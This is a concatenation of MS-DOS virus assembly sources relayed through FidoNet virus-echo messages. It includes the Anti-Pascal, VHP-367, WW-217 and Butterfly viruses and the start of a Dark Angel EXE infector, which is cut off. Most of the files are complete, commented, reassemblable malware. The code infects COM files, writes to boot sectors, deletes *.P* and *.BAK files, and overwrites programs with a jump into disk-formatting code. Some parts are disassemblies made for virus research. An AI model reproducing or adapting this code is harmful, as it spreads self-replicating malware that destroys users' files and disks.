; ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
; ú Bulgaria, 1404 Sofia, kv. "Emil Markov", bl. 26, vh. "W", et. 5, ap. 51 ú
; ú Telephone: Private: +359-2-586261, Office: +359-2-71401 ext. 255 ú
; ú ú
; ú The 'Anti-Pascal' Virus, version AP-440 ú
; ú Disassembled by Vesselin Bontchev, July 1990 ú
; ú ú
; ú Copyright (c) Vesselin Bontchev 1989, 1990 ú
; ú ú
; ú This listing is only to be made available to virus researchers ú
; ú or software writers on a need-to-know basis. ú
; ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
; The disassembly has been tested by re-assembly using MASM 5.0.
code segment
assume cs:code, ds:code
org 100
v_const = 2042d
start:
jmp v_entry
db 0CA ; Virus signature
db (2048d - 9) dup (90)
mov ax,4C00
int 21
v_start label byte
first4 db 0E9, 0F8, 7, 90
allcom db '*.COM', 0
mydta label byte
reserve db 15 dup (?)
attrib db ?
time dw ?
date dw ?
fsize dd ?
namez db 14d dup (?)
allp db 0, '????????P??'
allbak db 0, '????????BAK'
maxdrv db ?
sign db 'ICS 89'
v_entry:
push ax ; Save AX & DX
push dx
mov ah,19 ; Get the default drive
int 21
push ax ; Save it on stack
mov ah,0E ; Set it as default (?!)
mov dl,al
int 21 ; Do it
call self ; Determine the virus' start address
self:
pop si
sub si,offset self-v_const
; Save the number of logical drives in the system:
mov byte ptr [si+offset maxdrv-v_const],al
; Restore the first 4 bytes of the infected program:
mov ax,[si+offset first4-v_const]
mov word ptr ds:[offset start],ax
mov ax,[si+offset first4+2-v_const]
mov word ptr ds:[offset start+2],ax
mov ah,1A ; Set new DTA
lea dx,[si+offset mydta-v_const]
int 21 ; Do it
pop ax ; Restore current drive in AL
push ax ; Keep it on stack
call inf_drive ; Proceed with the current drive
xor al,al ; For all logical drives in the system
drv_lp:
call inf_drive ; Proceed with drive
jbe drv_lp ; Loop until no more drives
pop ax ; Restore the saved current drive
mov ah,0E ; Set it as current drive
mov dl,al
int 21 ; Do it
mov dx,80 ; Restore original DTA
mov ah,1A
int 21 ; Do it
mov si,offset start
pop dx ; Restore DX & AX
pop ax
jmp si ; Run the original program
inf_drive:
push ax ; Save the selected drive number on stack
mov ah,0E ; Select that drive
mov dl,al
int 21 ; Do ti
pop ax ; Restore AX
push ax ; Save the registers used
push bx
push cx
push si ; Save SI
mov cx,1 ; Read the boot sector of the drive specified
xor dx,dx
lea bx,[si+offset v_end-v_const]
push ax ; Save AX
push bx ; Save BX, CX & DX also
push cx
push dx
int 25 ; Do read
pop dx ; Clear the stack
pop dx ; Restore saved DX, CX & BX
pop cx
pop bx
jc bad_drv ; Exit on error
inc byte ptr [bx] ; Increment the first byte (?!)
cmp byte ptr [bx+1],6F ; Second byte == 111 (?!)
jne wr_drive ; Write the new values if not
bad_drv:
pop ax ; Restore AX
pop si ; Restore SI
drv_xit:
pop cx ; Restore used registers
pop bx
pop ax
inc al ; Go to next drive number
cmp al,[si+offset maxdrv-v_const] ; See if there are more drives
ret ; Exit
wr_drive:
pop ax ; Restore drive number in AL
int 26 ; Do write
pop ax ; Clear the stack
pop si ; Restore Si
jc drv_xit ; Exit on error
; Find first COM file on the current directory of the selected drive:
mov ah,4E
xor cx,cx ; Normal files only
lea dx,[si+offset allcom-v_const] ; File mask
next:
int 21 ; Do find
jc no_more ; Quit search if no more such files
lea dx,[si+offset namez-v_const] ; Get file name found
call infect ; Infect that file
mov ah,4F ; Prepare for FindNext
jc next ; If infection not successful, go to next file
jmp drv_xit ; Otherwise quit
no_more:
lea di,[si+offset v_end-v_const]
cmp byte ptr [di],'Z'
jb drv_xit
mov ah,13 ; Delete all *.P* files in that dir
lea dx,[si+offset allp-v_const]
int 21 ; Do it
cmp al,-1
je drv_xit ; Exit on error
mov ah,13 ; Delete all *.BAK files too
lea dx,[si+offset allbak-v_const]
int 21 ; Do it
jmp drv_xit ; Done. Exit
namaddr dw ? ; Address of the file name buffer
infect:
mov [si+offset namaddr-v_const],dx ; Save file name address
mov ax,4301 ; Reset all file attributes
xor cx,cx
int 21 ; Do it
jnc inf_cont ; Continue if all OK
inf_xit:
ret ; Otherwise exit
inf_cont:
mov ax,3D02 ; Open file for both reading and writing
int 21
jc inf_xit ; Exit on arror
mov bx,ax ; Save file handle in BX
mov cx,4 ; Read the first 4 bytes of the file
mov ah,3F
lea di,[si+offset first4-v_const] ; Save them in first4
mov dx,di
int 21 ; Do it
jc quit ; Exit on error
cmp byte ptr [di+3],0CA ; File already infected?
stc ; Set CF to indicate it
jz quit ; Don't touch this file if so
mov cx,[si+offset fsize-v_const]
cmp cx,2048d ; Check if file size >= 2048 bytes
jb quit ; Exit if not
cmp cx,64000d ; Check if file size <= 64000 bytes
stc ; Set CF to indicate it
ja quit ; Exit if not
xor cx,cx ; Seek to file end
xor dx,dx
mov ax,4202
int 21 ; Do it
push ax ; Save file size on stack
jc quit ; Exit on error
; Write the virus body after the end of file:
mov cx,v_end-v_start
nop
lea dx,[si+offset v_start-v_const]
mov ah,40
int 21 ; Do it
jc quit ; Exit on error
pop ax ; Restore file size in AX
; Form a new address for the first JMP instruction in AX:
add ax,v_entry-v_start-3
mov byte ptr [di],0E9 ; JMP opcode
mov [di+1],ax
mov byte ptr [di+3],0CA ; Set the "file infected" sign
xor cx,cx ; Seek to file beginning
xor dx,dx
mov ax,4200
int 21 ; Do it
jc quit ; Exit on error
mov cx,4 ; Write the new first 4 bytes of the file
mov dx,di
mov ah,40
int 21 ; Do it
quit:
pushf ; Save flags
mov ax,5701 ; Set file date & time
mov cx,[si+offset time-v_const] ; Get time from mydta
mov dx,[si+offset date-v_const] ; Get date from mydta
int 21 ; Do it
mov ah,3E ; Close the file
int 21
mov ax,4301 ; Set file attributes
mov cl,[si+offset attrib-v_const] ; Get them from mydta
xor ch,ch
mov dx,[si+offset namaddr-v_const] ; Point to file name
int 21 ; Do it
popf ; Restore flags
ret
v_end equ $
code ends
end start
;-+- CrossPoint v3.02
; + Origin: <Rudy's Place - Israel> Hard disks never die... (2:283/718)
;=============================================================================
;
;Yoo-hooo-oo, -!
;
;
; þ The MeÂeO
;
;/i Initialize all segments
;
;--- Aidstest Null: /Kill
; * Origin: ùPVT.ViRIIúmainúboardú / Virus Research labs. (2:5030/136)

312
MSDOS/Virus.MSDOS.Unknown.vir57.asm Normal file
View File

@ -0,0 +1,312 @@
;Ä PVT.VIRII (2:465/65.4) ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ PVT.VIRII Ä
; Msg : 47 of 54
; From : MeteO 2:5030/136 Tue 09 Nov 93 09:17
; To : - *.* - Fri 11 Nov 94 08:10
; Subj : V_VHP367.ASM
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
;.RealName: Max Ivanov
;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
;* Kicked-up by MeteO (2:5030/136)
;* Area : VIRUS (Int: ˆ­ä®p¬ æ¨ï ® ¢¨pãá å)
;* From : Graham Allen, 2:283/718 (06 Nov 94 17:55)
;* To : Adam Happ
;* Subj : V_VHP367.ASM
;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
;@RFC-Path:
;ddt.demos.su!f400.n5020!f3.n5026!f2.n51!f550.n281!f512.n283!f35.n283!f7.n283!f7
;18.n283!not-for-mail
;@RFC-Return-Receipt-To: Graham.Allen@f718.n283.z2.fidonet.org
page ,132
name VHP_367
title Virus; based on the famous VHP-648 virus
.radix 16
code segment
assume cs:code,ds:code
org 100
environ equ 2C
newjmp equ 7Bh ;Code of jmp instruction
codeptr equ 7A ;Here is formed a jump to the virus code
pname equ 78 ;Offset of file name in the dir path
poffs equ 76 ;Offset in the contents of the `PATH' variable
errhnd equ 74 ;Save place for the old error handler
fname equ 70 ;Path name to search for
mydta equ 2C ;DTA for Find First/Next:
attrib equ 17 ;File attribute
time equ 16 ;File time
date equ 14 ;File date
fsize equ 12 ;File size
namez equ 0E ;File name found
start:
jmp short virus
nop
int 20
data label byte ;Data section
saveins db 3 dup (90) ;Original first 3 bytes
allcom db '*.COM',0 ;Filespec to search for
pathstr db 'PATH='
;This replaces the first instruction of a destroyed file.
;It's a jmp instruction into the hard disk formatting program (IBM XT only):
bad_jmp db 0EA,6,0,0,0C8
virus:
mov di,offset start ;Push the program true start address
push di ; onto the stack
push ax ;Save AX
call self ;Detrmine the virus start address
nop ;For those looking for the E80000 pattern
self:
pop bx
sub bx,self-data-1 ;Keep bx pointed at data
cld
lea si,[bx+saveins-data] ;Original instruction saved there
movsw ;Move 2 + 1 bytes
movsb
mov si,bx ;Keep SI pointed at data
lea bp,[bx+endcode-data+7A] ;Reserve local storage
mov ax,3524 ;Get interrupt 24h handler
int 21 ; and save it in errhnd
mov [bp-errhnd],bx
mov [bp-errhnd+2],es
mov ah,25 ;Set interrupt 24h handler
lea dx,[si+handler-data]
cmp al,0 ;DOS < 2.0 zeroes AL
je exit ;Exit if version < 2.0
push ds
int 21
lea dx,[bp-mydta]
mov ah,1A ;Set DTA
int 21
push si ;Save SI
mov es,ds:[environ] ;Environment address
xor di,di ;Point ES:DI at the environment start
mov bx,si
mov al,0 ;0 means end of an enveronment variable
search: ;Search 'PATH' in the environment
lea si,[bx+pathstr-data]
mov cx,5 ;5 letters in 'PATH='
repe cmpsb
je pfound ;PATH found, continue
mov ch,80 ;Maximum 32 K in environment
repne scasb ;If not, skip through next 0
cmp al,es:[di] ;End of environment?
jne search ;If not, retry
xor di,di ;0 indicates no PATH found
pfound:
pop si ;Restore SI & ES
pop es
mov [bp-poffs],di ;Save 'PATH' offset in poffs
lea di,[bp-fname]
mov [bp-pname],di
filesrch:
lea si,[bx+allcom-data]
movsw
movsw ;Move '*.COM' at fname
movsw
mov si,bx ;Restore SI
mov ah,4E ;Find first file
lea dx,[bp-fname]
mov cl,11b ;Hidden, Read/Only or Normal files
jmp short findfile
checkfile:
mov al,[bp-time] ;Check file time
and al,11111b ; (the seconds, more exactly)
cmp al,62d/2 ;Are they 62?
;If so, file is already contains the virus, search for another:
je findnext
;Is 10 <= file_size <= 64,000 bytes?
sub word ptr [bp-fsize],10d
cmp [bp-fsize],64000d-10d+1
jc process ;If so, process the file
findnext: ;Otherwise find the next file
mov ah,4F ;Find next file
findfile:
int 21
jnc checkfile ;If found, go chech some conditions
nextdir:
mov si,[bp-poffs] ;Get the offset in the PATH variable
or si,si ;0 means end of PATH
jnz skip2
olddta:
push ds ;Save DS
mov ax,2524 ;Set interrupt 24h handler
lds dx,dword ptr [bp - errhnd]
int 21
pop ds ;Restore DS
exit:
mov ah,1A ;Set DTA
mov dx,80 ;Restore DTA
int 21
pop ax
ret ;Go to CS:IP by doing funny RET
skip2:
push ds ;Save DS
lea di,[bp-fname] ;Point ES:DI at fname
mov ds,ds:[environ] ;Point DS:SI at the PATH variable found
cpydir:
lodsb ;Get a char from the PATH variable
cmp al,';' ;`;' means end of directory
je enddir
cmp al,0 ;0 means end of PATH variable
je endpath
stosb ;Put the char in fname
jmp cpydir ;Loop until done
endpath:
xor si,si ;Zero SI to indicate end of PATH
enddir:
pop ds ;Restore DS
mov [bp-poffs],si ;Save the new offset in the PATH variable
mov al,'\' ;Add '\'
stosb
mov [bp-pname],di
jmp filesrch ;And go find the first *.COM file
process:
mov di,[bp-pname]
lea si,[bp-namez] ;Point SI at namez
cpyname:
lodsb ;Copy name found to fname
stosb
cmp al,0
jne cpyname
mov si,bx ;Restore SI
mov ax,4301 ;Set file attributes
call clr_cx_dos
mov ax,3D02 ;Open file with Read/Write access
int 21
jc oldattr ;Exit on error
mov bx,ax ;Save file handle in BX
mov ah,2C ;Get system time
int 21
and dh,111b ;Are seconds a multiple of 8?
jnz infect ;If not, contaminate file (don't destroy):
;Destroy file by rewriting an illegal JMP as a first instruction:
mov cx,5 ;Write 5 bytes
lea dx,[si+bad_jmp-data] ;Write THESE bytes
jmp short do_write ;Do it
;Try to contaminate file:
;Read first instruction of the file (first 3 bytes) and save it in saveins:
infect:
mov ah,3F ;Read from file handle
mov cx,3 ;Read 3 bytes
lea dx,[si+saveins-data] ;Put them there
call dos_rw
jc oldtime ;Exit on error
;Move file pointer to end of file:
mov ax,4202 ;LSEEK from end of file
call clr_dx_cx_dos
add ax,virus-data-3 ;Add virus data length to get code offset
mov [bp-codeptr],ax ;Save result in codeptr
mov cx,endcode-data ;Virus code length as bytes to be written
mov dx,si ;Write from data to endcode
call dos_write ;Write to file handle
jc oldtime ;Exit on error
call lseek ;LSEEK to the beginning of the file
;Rewrite the first instruction of the file with a jump to the virus code:
mov cl,3 ;3 bytes to write
lea dx,[bp-newjmp] ;Write THESE bytes
do_write:
call dos_write ;Write to file handle
oldtime:
mov dx,[bp-date] ;Restore file date
mov cx,[bp-time] ; and time
or cl,11111b ;Set seconds to 62 (the virus' marker)
mov ax,5701 ;Set file date & time
int 21
mov ah,3E ;Close file handle
int 21
oldattr:
mov ax,4301 ;Set file attributes
mov cx,[bp-attrib] ;They were saved in attrib
and cx,3F
lea dx,[bp-fname]
int 21 ;Do it
jmp olddta ;And exit
lseek:
mov ax,4200 ;LSEEK from the beginning of the file
clr_dx_cx_dos:
xor dx,dx ;From the very beginning
clr_cx_dos:
xor cx,cx ;Auxiliary entry point
db 3Dh ;Trick
dos_write:
mov ah,40 ;Write to file handle
dos_rw:
int 21
jc dos_ret ;Exit on error
cmp ax,cx ;Set CF if AX < CX
dos_ret:
ret
handler: ;Critical error handler
mov al,0 ;Just ignore the error
iret ; and return
db 0E9 ;The JMP opcode
endcode label byte
code ends
end start
;-+- GEcho 1.10+
; + Origin: <Rudy's Place - Israel> Hard disks never die... (2:283/718)
;=============================================================================
;
;Yoo-hooo-oo, -!
;
;
; þ The MeÂeO
;
;/d Warn if duplicate symbols in libraries
;
;--- Aidstest Null: /Kill
; * Origin: ùPVT.ViRIIúmainúboardú / Virus Research labs. (2:5030/136)

180
MSDOS/Virus.MSDOS.Unknown.vir58.lst Normal file
View File

@ -0,0 +1,180 @@
;Ä PVT.VIRII (2:465/65.4) ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ PVT.VIRII Ä
; Msg : 48 of 54
; From : MeteO 2:5030/136 Tue 09 Nov 93 09:17
; To : - *.* - Fri 11 Nov 94 08:10
; Subj : WW_217.ASM
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
;.RealName: Max Ivanov
;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
;* Kicked-up by MeteO (2:5030/136)
;* Area : VIRUS (Int: ˆ­ä®p¬ æ¨ï ® ¢¨pãá å)
;* From : Graham Allen, 2:283/718 (06 Nov 94 17:55)
;* To : Adam Happ
;* Subj : WW_217.ASM
;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
;@RFC-Path:
;ddt.demos.su!f400.n5020!f3.n5026!f2.n51!f550.n281!f512.n283!f35.n283!f7.n283!f7
;18.n283!not-for-mail
;@RFC-Return-Receipt-To: Graham.Allen@f718.n283.z2.fidonet.org
; new virus obtained from Marek Filipiak 1990-10-05
;
; dissasembled by Andrzej Kadlof
;
0100 E90200 jmp 0105
; 0103 00F0 add al,dh
;=========================
; virus main entry point
0105 E8BC00 call 01C4 ; set SI to start of virus code
0108 56 push si
; restore main COM file
0109 81C6D201 add si,01D2 ; 3 oryginal bytes of victim
010D BF0001 mov di,0100
0110 B90300 mov cx,0003
0113 F3A4 rep movsb
0115 5E pop si
0116 B44E mov ah,4E ; find first
0118 BAC901 mov dx,01C9 ; address of *.COM,0 in virus
011B 01F2 add dx,si ; in memory
011D B9FFFF mov cx,FFFF ; all posible atributes
0120 CD21 int 21
0122 723D jb 0161 ; no more files, return to main file
0124 52 push dx
0125 B8023D mov ax,3D02 ; open file for read write
0128 BA9E00 mov dx,009E ; DS:DX ASCIIZ file name
012B CD21 int 21
012D 722B jb 015A ; error
012F 8BD8 mov bx,ax ; store file handle
0131 8B0E9C00 mov cx,[009C] ; file length in DTA
0135 8B169A00 mov dx,[009A]
0139 83EA02 sub dx,0002 ; move file pointer back two bytes
013C B80142 mov ax,4201
013F CD21 int 21
0141 BAD501 mov dx,01D5 ; buffer in virus body
0144 01F2 add dx,si ; in memory
0146 B90200 mov cx,0002 ; number of bytes
0149 B43F mov ah,3F ; read file
014B CD21 int 21
014D 8B84D501 mov ax,[si+01D5] ; readed 2 bytes
0151 3D5757 cmp ax,5757 ; WW virus sygnature
0154 7510 jne 0166 ; file not infected
0156 B43E mov ah,3E ; close file
0158 CD21 int 21
015A 5A pop dx ; restore DTA
015B B44F mov ah,4F ; find next
015D CD21 int 21
015F 73C3 jnb 0124 ; check file
; return to main file
0161 BB0001 mov bx,0100
0164 FFE3 jmp bx
;---------------
; infect file
0166 A19A00 mov ax,[009A] ; file length
0169 2D0300 sub ax,0003 ; starting adres in infected file
016C 8984D001 mov [si+01D0],ax ; form JMP nnnn instruction
0170 E83E00 call 01B1 ; move file pointer at the beginning
0173 BAD201 mov dx,01D2 ; buffer for first 3 bytes of victim
0176 01F2 add dx,si ; in memory
0178 B90300 mov cx,0003 ; number of bytes
017B B43F mov ah,3F ; read file
017D CD21 int 21
017F E82F00 call 01B1 ; move file pointer at the begining
0182 BACF01 mov dx,01CF ; address of new starting bytes
0185 01F2 add dx,si ; in memory
0187 B90300 mov cx,0003 ; number of bytes
018A B440 mov ah,40 ; write to file
018C CD21 int 21
018E E82500 call 01B6 ; move file pointer at the end of file
0191 8BD6 mov dx,si
0193 81C20001 add dx,0100 ; virus code in memory
0197 B9D900 mov cx,00D9 ; virus length
019A B440 mov ah,40 ; write to file
019C CD21 int 21
019E B80157 mov ax,5701 ; set time/date file stamp
01A1 8B0E9600 mov cx,[0096] ; restore from DTA
01A5 8B169800 mov dx,[0098]
01A9 CD21 int 21
01AB B43E mov ah,3E ; close file
01AD CD21 int 21
01AF EBB0 jmp 0161 ; jump to main file
;-------------------------------------------------
; move file pointer to the beginning of the file
01B1 B000 mov al,00
01B3 EB06 jmp 01BB
01B5 90 nop
;--------------------------------------
; move file pointer to the end of file
01B6 B002 mov al,02
01B8 EB01 jmp 01BB
01BA 90 nop
01BB B442 mov ah,42
01BD 31C9 xor cx,cx
01BF 31D2 xor dx,dx
01C1 CD21 int 21
01C3 C3 ret
;----------------------------------------------------
; find address of first byte of virus code in memory
01C4 8BEC mov bp,sp
01C6 8B7600 mov si,[bp]
01C9 81EE0301 sub si,0103
01CD C3 ret
;----------------
; working area
01CE 2A 2E 43 4F 4D 00 ; *.COM, 0
01D4 E9 02 00 ; new first 3 bytes for victim
01D7 EA F0 FF ; oryginal first 3 byte of victim
01DA 00 F0 ; buffer for last 2 bytes of inspected file
01DC 57 57 ; virus sygnature WW
;-+- DinoMail v.1.0 Alpha
; + Origin: Hans' Point with DOSBoss West, Amsterdam (2:283/718)
;=============================================================================
;
;Yoo-hooo-oo, -!
;
;
; þ The MeÂeO
;
;/w-xxx,/w+xxx Disable (-) or enable (+) warning xxx
;
;--- Aidstest Null: /Kill
; * Origin: ùPVT.ViRIIúmainúboardú / Virus Research labs. (2:5030/136)

218
MSDOS/Virus.MSDOS.Unknown.vir61.asm Normal file
View File

@ -0,0 +1,218 @@
;Ä PVT.VIRII (2:465/65.4) ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ PVT.VIRII Ä
; Msg : 51 of 54
; From : MeteO 2:5030/136 Tue 09 Nov 93 09:17
; To : - *.* - Fri 11 Nov 94 08:10
; Subj : BUTTRFLY.ASM
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
;.RealName: Max Ivanov
;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
;* Kicked-up by MeteO (2:5030/136)
;* Area : VIRUS (Int: ˆ­ä®p¬ æ¨ï ® ¢¨pãá å)
;* From : Hans Schotel, 2:283/718 (06 Nov 94 17:56)
;* To : Fred Lee
;* Subj : BUTTRFLY.ASM
;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
;@RFC-Path:
;ddt.demos.su!f400.n5020!f3.n5026!f2.n51!f550.n281!f512.n283!f35.n283!f7.n283!f7
;18.n283!not-for-mail
;@RFC-Return-Receipt-To: Hans.Schotel@f718.n283.z2.fidonet.org
Comment|
************************************************************************
Virus Name: Butterfly Virus
Effective Length: 302 bytes
Disassembled by Silent Death - 1993
Notes:
- Non-Resident .COM appender
- infects up to 4 files in the current directory
- infected files have 01h as the 4th byte
- ok virus to learn off of but a lot of wasteful code
To Compile: [Byte matchup!]
TASM /m File.asm
TLINK /t FILE.obj
************************************************************************|
.model tiny
.code
org 100h
start:
jmp virus
nop
nop
oldjmp db 0cdh ; int 20h
newjmp db 20h
db 90h ; nop
id db 1 ; infection marker
virus:
call delta ; get delta offset
delta:
pop bp
sub bp,10Bh ; adjust delta offset
mov di,100h ; move bytes to the start
lea si,[bp+oldjmp] ; original starting
mov cx,4 ; move four bytes
cld ; clear direction flag
rep movsb ; move the bytes
mov ah,1Ah ; set dta
lea dx,[bp+dta] ; set into heap
int 21h
mov byte ptr [bp+offset counter],0 ; reset counter
mov ah,4Eh ; find first asciiz file
lea si,[bp+dta+1eh] ; points to fname in dta
lea dx,[bp+fspec] ; files to find (*.COM)
push dx ; save file spec
jmp short findfiles
returntohost:
mov ah,1Ah ; set dta
mov dx,80h ; to original position
int 21h
xor ax,ax ; clear all registers
xor bx,bx ; no real need to
xor cx,cx
xor dx,dx
xor si,si
xor di,di
mov sp,0FFFEh ; adjust stack pointer
mov bp,100h ; return to here
push bp
xor bp,bp ; clear this
retn ; return to host
closeup:
or bx,bx ; is handle 0?
jz findnext ; yup so don't bother closing
mov ch,0 ; get attributes
mov cl,[bp+dta+15h] ; theres no point!
mov ax,5701h ; set files date/time
mov cx,word ptr [bp+dta+16h]; get original time
mov dx,word ptr [bp+dta+18h]; get original date
int 21h
mov ah,3Eh ; close file
int 21h
xor bx,bx ; delete handle
findnext:
mov ah,4Fh ; find next file
findfiles:
pop dx ; get filespec
push dx
mov cx,7 ; all attributes
xor bx,bx ; make sure no handle
int 21h
jnc infect ; jump if file found
jmp returntohost2 ; no files found then quit
vname db 0FFh
db 'Goddamn Butterflies' ; YA Know!
db 0FFh
infect:
mov dx,si ; dx => fname in dta
mov ax,3D02h ; open file read/write
int 21h
jc closeup ; if error close up, get another
mov bx,ax ; handle to bx
mov ah,3Fh ; read from file
mov cx,4 ; four bytes
lea dx,[bp+oldjmp] ; save here
int 21h
mov ax,word ptr [bp+dta+23h]; get end of filename
cmp ax,444Eh ; is file command.com?
je closeup ; yup so leave it
cmp [bp+id],1 ; is file infected?
je closeup ; yup so leave it
mov ax,word ptr [bp+dta+1ah]; get file size
cmp ax,121 ; is file smaller than 121?
jb closeup ; if it is leave it
mov ax,4202h ; file pointer to end
cwd
xor cx,cx
int 21h
cmp ax,64768 ; is file to big to infect
ja closeup ; if above then jump
mov [bp+data],ax ; save file size
lea dx,[bp+oldjmp] ; buffer to write from
mov cx,4 ; 4 bytes
mov ah,40h ; write oldjmp to end of file
int 21h
lea dx,[bp+virus] ; start of virus
mov cx,12Ah ; write virus (298) to end
mov ah,40h ; write to file
int 21h
mov ax,4200h ; file pointer to start
cwd
xor cx,cx
int 21h
mov ax,[bp+data] ; get the file size
inc ax ; increment the file size
mov word ptr [bp+newjmp],ax ; save the new jump
mov [bp+oldjmp],0E9h ; new jump
mov [bp+id],1 ; infection marker
lea dx,[bp+oldjmp] ; new jump
mov ah,40h ; write new start
mov cx,4 ; four bytes
int 21h
inc [bp+counter]
cmp [bp+counter],4 ; has 4 files been infected?
jae returntohost3 ; yup so return to host
jmp closeup ; close current file
returntohost2: ; This is a total waste!
mov di,100h ; start of file
cmp word ptr [di],20CDh ; are we the original
je returntohost3 ; yup
returntohost3:
jmp returntohost
fspec db '*.COM',0 ; files to find
dta db 43 dup (0) ; holds dta
counter db 0 ; holds file counter
data dw 0 ; holds new jump offset
end start
;-+- Concord/QWK O.O1 Beta-7
; + Origin: Data Fellows BBS (2:283/718)
;=============================================================================
;
;Yoo-hooo-oo, -!
;
;
; þ The MeÂeO
;
;/L Specify library search paths
;
;--- Aidstest Null: /Kill
; * Origin: ùPVT.ViRIIúmainúboardú / Virus Research labs. (2:5030/136)

219
MSDOS/Virus.MSDOS.Unknown.vir62.asm Normal file
View File

@ -0,0 +1,219 @@
;Ä PVT.VIRII (2:465/65.4) ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ PVT.VIRII Ä
; Msg : 52 of 54
; From : MeteO 2:5030/136 Tue 09 Nov 93 09:17
; To : - *.* - Fri 11 Nov 94 08:10
; Subj : DEMOEXE.ASM
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
;.RealName: Max Ivanov
;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
;* Kicked-up by MeteO (2:5030/136)
;* Area : VIRUS (Int: ˆ­ä®p¬ æ¨ï ® ¢¨pãá å)
;* From : Fred Lee, 2:283/718 (06 Nov 94 17:58)
;* To : Clif Jessop
;* Subj : DEMOEXE.ASM
;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
;@RFC-Path:
;ddt.demos.su!f400.n5020!f3.n5026!f2.n51!f550.n281!f512.n283!f35.n283!f7.n283!f7
;18.n283!not-for-mail
;@RFC-Return-Receipt-To: Fred.Lee@f718.n283.z2.fidonet.org
.model tiny ; Handy TASM directive
.code ; Virus code segment
org 100h ; COM file starting IP
; Cheesy EXE infector
; Written by Dark Angel of PHALCON/SKISM
; For 40Hex Number 8 Volume 2 Issue 4
id = 'DA' ; ID word for EXE infections
startvirus: ; virus code starts here
call next ; calculate delta offset
next: pop bp ; bp = IP next
sub bp,offset next ; bp = delta offset
push ds
push es
push cs ; DS = CS
pop ds
push cs ; ES = CS
